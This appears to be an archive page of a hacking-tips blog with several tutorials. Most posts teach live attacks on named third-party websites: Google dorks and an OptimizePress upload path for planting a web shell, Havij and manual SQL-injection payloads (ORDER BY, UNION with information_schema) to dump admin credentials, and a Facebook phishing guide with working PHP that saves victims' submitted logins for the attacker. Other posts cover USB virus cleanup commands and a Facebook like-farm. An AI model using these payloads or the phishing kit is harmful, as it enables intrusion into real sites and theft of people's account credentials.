Home » Posts filed under Tutorials

WordPress OptimizePress Themes File Upload Vulnerability

WordPress OptimizePress Themes File Upload Vulnerability

Hello Friends today i am here agian to share with you a new trick to hack a website.

WordPress OptimizePress Themes File Upload Vulnerability.

This is said to be WordPress OptimizePress Themes File Upload Vlanerability.Through this valnerability we can upload any type of website for example php,exe,com,jpg,mp3,asp,bat etc.
Ok let me tell you I am going to outside of the topic.
Ok first!
How you will find these types of valnerable website for that you need Google Dorks whixh are given below.
(1) inurl:/wp-content/themes/OptimizePress/

(2) inurl:/wp-content/uploads/optpress/
Just Put anyone of this dork in google and search it like this.
Google Dorks

 After this just pick any web from it.
Exploit:http://yourweb.com/wp-content/themes/OptimizePress/lib/admin/media-upload.php
For exmple i have this website.
Web:https://www.createawesomeinterviews.com/wp-content/themes/OptimizePress/js/
After using exploit the url will look like this i mean after /js/ just put or write /admin/media-upload.php and hit enter then it will look like this.
https://www.createawesomeinterviews.com/wp-content/themes/OptimizePress/js/
admin/media-upload.php


Then just select your shell and click upload file,your file will be uploaded.
For finding your shell patch use this url.
http://yoursite.com/wp-content/uploads/optpress/images_comingsoon/


 Enjoy Happy Hacking!
Thanks for Reading it.
Regards:Pk_Ghost.
, 08:30 No comments
Labels: ,

How to hack website with Havij

                        How to hack website with Havij

Hi Friends.
Today i will teach you how to hack website with Havij.

 First download Havij fro here Click here to dowload Havij

 Then install it.After installation run it.First you need a sql valnerable website i have find.

                                    http://www.hypetrading.com/productinfo.php?id=285

 You can also find SQL valnerable website through these dorks.

                                          Just put this website in Havij and click on run like this.
                                                         
                                                           Now click on Analyze

Then it will show alert message not click anywhere be patience for sometime and leave Havij to find Valnerbility and inject it.It will find Version+Database+SQl Type.
After this click on "Table" and agian click on "Get Tables" and wait for a while let allow Havij to do it action.
After finding all "tables" click on "admin table" then then click on "Columns" and wait agian for a while.
Now just click on username column and password table and click "Get Data".

Hurrrrrrrrrrrrrahhhhh you have done now you have got admin username and password now click on "Find Admin".If the pass is  in MD5 then crack it using Havij click on crack and enjoy.Then login in to website and do what you want.

Stay connected.
Thanks for watching it.

00:46 No comments
Labels:

How to hack website with SQL Injection

In the name of Allah who is the most benfecant and most Mercifull. 
Hello,How are you?
How to hack website with SQL Injection.

In this tutorial i will tell you how to hack a website with SQL Injection.

 Fisrt telling you the method you should know what is SQL.
SQL means Structure Querry Language.
Through this language we take admin username and password. 
Ok lets start.
First you should have a website valnerable to SQL Injection.
For this you need some Dorks.There are many Dorks but you can simply use these.


As you can see that their are many website you can take anyone of them and try to inject.
Ok lets start it i have have found a website valnerable to SQL Injection.
First for finding that is that website valnerable to SQL or not which you are going to inject.
I am using this site which i have found through these Dorks.

Hit enter and see the result that web is secure.
 See the website is running normally.
As i have tell you that which site you are going to inject is this valnerable to SQL Injection for this we put ' at the end of URL.Just like this.
Hit enter and see the result.You will get result just like this.    
 We have an SQL error.
 Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/jatinder/public_html/products.php on line 118

Now from this picture you can see that website is valnerable to SQL Injection. 
Now we are sure that website is valnerable to SQL Injection.
Next step is to find the columns of website just follow me.

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/jatinder/public_html/products.php on line 118 

Same error like previous one its means that 99 column is not in the website now we have to decrease the number of column. 
http://www.comtronics.co.in/products.php?id=30 order by 7-- error again.
http://www.comtronics.co.in/products.php?id=30 order by 6-- error agian.
http://www.comtronics.co.in/products.php?id=30 order by 5-- no error.
Its means that website having 5 columns.
Now we have to find the name of those columns+tables.
Hit enter and see the result.
     

  
Now you can see in the picture too that number 3 column is valnerable of the website so will attack on this column to get admin username+password.Now we have to find the tables.

http://www.comtronics.co.in/products.php?id=-30 union select 1,2,(table_name),4,5 from information_schema.tableswheretable_schema=database()--
Hit enter and see the result.As you can see that their are many othe tables but for us admin table is so important to get his username+password. 
"admin" is the name of table.Now we have to find the columns names.
Hit enter and see the result.
As previous one mean as we have found the tables admin table was important for us so in this password+username columns are important for us to get admin username+password.
Now our all work is done we have find his all detail now simply with the help of admin
columns+tables we will get his username+password.
  
We have find admin username+password within one shot.
We use group_concat to get both username+password in one shot but you can find one by one like this because some website not accept group_concat so for that we can try one by one.
            

Here is the username of admin. 

Here is the password of admin.
   
Happy Hacking. 
I think this tutorial will be helpfull for you.
Note:This tutorial is only for educational purpose only.I will not be responsible for any danger.
Stay Connected.
Thanks.

03:02 No comments
Labels:

How to remove shorcut virus with cmd ?


 How to remove Virus with CMD? 




In the name of Allah who is the most benefcant and Mercifull.


Fisrt of all telling you how to remove virus with cmd you should know what is virus actually.

A virus is a small tiny distructive programme that can damage our computer and computer not work properly or like ruotine work before it was secure.

 These shorcut viruses are those which canoverts all your data inside your pendrive or Harddisk or simply you can say storage device which you are using to store data to shorcuts,and which are recoverable.

 Now you not have to do anything else just follow these steps given by me to remove shorcut viruses from you storage devices and recover back your files.

 (1) First goto start menu and open run,and write cmd and after wirting then press enter,cmd will be opened infront of you.


(2) Then goto your pendrive directory.
(3) Then type this command : del *.lnk  and then hit Enter key.
(4) Then again type     attrib -h -r -s /s /d e:\*.*   and after writing this command press Enter key again.
You can see this picture. 
Recover you files.

You can rocver your files through "Winrar".
Open Winrar Application.
Navigate to your Pendrive location or PC folder location.
Cpy files and paste where you want.
Formate your Pendrive.

How to remove empty folder virus with cmd?
Got some files in your Pendrive but make sure they must be epmty.Because of the virus in your Pendrive malfunctions your Drive.How to remove this empty folder virus and recover files?
Just follow my given step to get yourself out from this problem.
Same like previous click on start menu and click on Runs then write in it "cmd" or you can also write "command.com".

Then type this command:       attrib -h -r -s /s /d x:\*.* 
Here x: shows your Drive so replace it with your drive alphabets name that you have inserted into your computer.If your Pendrive shows the Drive alphabet as "G" then type this command:     attrib -h -r -s /s /d G:\*.*    and hit Enter key.


 

You have done now and relax and enjoy in running your pc normally.

Note:After doing all these restart your computer and make sure you not have to open any Drive after perfoming the following steps.

Stay Connected for more tricks.
Thanks for reading this. 
02:14 No comments
Labels:

CHANGE FACEBOOK LOGIN BACKGROUND QUICKLY & FREE USING GOOGLE CHROME

You can see this background login screen  
Same as preevious one  Similar to the first ne but the background is change  

CHANGE FACEBOOK LOGIN BACKGROUND QUICKLY & FREE USING GOOGLE CHROME.

Hello Guys,.Its an latest & quick way to get rid of the old and boring login screen,make us feel bored not to use facebook sometime having same login page image or screen.The traditional login Facebook screen is incredibly boring and monotous since it took a protracted time with no change since it has been developed.Now you will be able to amendment the facebook backgroung to any images which you want which make you feel fresh or happy,employing a terribly easy methodology.This trick is a couple of Chrome Extension that may assist you do this with few clicks.Using this simple method you can change and set your own login screen background image. 

Before changing login background let me tell you can use & follow the simlpe steps to change the Facebook Login Background.This is not really hard or difficult you simply need to download the following Chrome Extension.
1)You need to download,first of all this extension,goto face boob refresh chrome extension.
2)Goto the download link,&click free,then confirm by clicking add button.
3)After adding the plugin to Google Chrome,visit chrome://chrome/extensions/ to access all chrome extension settings.
4)Currently scroll down till you discover  the put in extension (FB Refresh),then click choices slightly below it.
how to change facebook login screen background picture Change Facebook Login Background Quickly & Free Using Google Chrome| the future technoloygy blogspot by Muneeb Khan 
5)When you click options,you will be redirected to settings  page of FB Refresh.
6)Under image (uniform reesource locator) URL/Upload section you can paste the Images URL that you can find on Google Image search or simply upload an image of you.
how to change facebook login screen background picture Change Facebook Login Background Quickly & Free Using Google Chrome| the future technoloygy blogspot by Muneeb Khan 
7)You have to click on save button within the bottom of the page.

Note*:Click on download button,Chnge facebook login background quickly extension,&then view the right corner wait for 5 seconds.Your download file will be infront of you.Further the new version will be uploaded soon.You can tap for change Facebook Login Background Extension.

** Before: Activating Must Check ReadMe File Present There In a RAR File And Follow The Simple Instruction.
If you not having Google Chrome download it from here. 
Click Here to Download Google Chrome
Click Here to Download Chrome+Extensions 
You can also watch this tutorial to take help. 


Stay Connected,
Thanks. 
, 02:59 No comments
Labels: ,

How to hack facebook account with Phishing

In the name of Allah who is the most Beneficant and Merciful.

 

Today i am here to share with you facebook account hacking tutorial.In this tutorial i will teach you how to hack any facebook account with phishing.

First What is Phishing. 

This phishing is not to catch any fish this phishing is an attempting to acquire information(and sometimes,indirectly,money)such as Username,Password, and Credits Card details by masquerading as a trustworthy entity in an electronic communication.Communication purporting to be from popular social websites,action sites,online payments processors or IT administrators are commonly used to rule the unsuspecting public.Phishing is typically carried out by E-mail spoofing or insatnt messaging, and it often directs to enter details at a fake website which look and feel almost identical to the orignal one.Phishing is an example of Social Engineering technique used to steal User and Password and exploits the poor usability of current web security technologies.Attempts to deal with the growing number of reported phishing incidents include ful translation,user training,public awareness and technical security measure.
Today we will create a facebook phishing which will looks similiar to a orignal page but its not acually will be on facebook .Whne victim enter his username,password you can see those details looking interesting......

Steps to create Phishing Page.....

Goto Facebook.com but make sure you must be logout then Right click on page you will see view page source click on that .

Now a new tab will be opened containing source code.Copy all stuff and paste it in notepad.
Now open same notepad and press CTRL+F  and type ACTION
You will have to find the text look like this
                     action="https://www.facebook.com/login.php?login_attempt=1" 
Delete all the text and and insted of it write action="post.php" .
Now save it as index.htm , index.html remember it.
Now your phishing pae is ready it will look like this image given below

Index.html


Now open another notepad and save the given php code and save it as Post.php 

<?php
header ('Location:http://www.facebook.com/');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?> 

 After saving it as post.php your file will look like this.
Post.php
Now save this file  but remember now you have two files index.html,index.htm or post.php.Remember file extension is important.
Now your half work is done now you need any free hosting website to upload these both files.You can use your own website if you have.
Some of free hosting website are: 

1)000webhost.com 
2)my3gb.com 
3)freehosting.com 
4)your-own-website.com 

But i prefer you to use 000webhost because it will be easy for you to use it.Now your own opinions as you wish. 



 Now goto Control Pannel and click on File Manager.
 After that a new wwindow or tab wil pop-up then click on Public_html.
 Delete the file name defualt.php and after deleting upload both file one by one name index.html or post.php

Now the last step click on view of index.html.It will look like same as facebook.com login page. 

Now copy the url of that page and send this link to your victim,when your victim try to login in to it with the username and password .the page redirectly connect to facebook. and you will be now able to see his username,password. 

For seeing username and password open your 000webhost account and go to file manager then public_html,here you find a new file named username.txt.

Now click on view of username.txt now you will have your friends username and password. 


This is a simple trick to hack any facebook account.

You can also watch this vedio for taking any help.  



Thanks for reading and watching. 
Saty Connected for more tricks. 

01:57 No comments
Labels:

How to get Autolikes on FaceBook

 


Hello Friendz today i am sharing with you autoliker script

How to get Atuolikes on FaceBook.

Here is the url. 

From here you can take likes:http://hublaa.me/ 

You can also watch vedio.

How to get Autolikes on FaceBook. 



Enjoy, 

Stay Connected,

Thanks. 
, 02:58 No comments
Labels: ,

How to hack website with sql injection

                                                 


Hello Guys today i am here to share with you sql injection it mean how to hack website with Sql injection.




Sql stands for Structed Querry Langauge
Attacker use this method and try to hack the website and get the Admin username and password and login to site .This vedio will InshAllah help you in SQL Injection.



Enjoy


stay connected for more tricks
I mentioned some valnerable website also you can use them to learn

 Click here for Valnerable website
Click here for Valnerable website
Click here for Valnerable website
Click here for Valnerable website

Stay Connected
Thanks
04:22 No comments
Labels: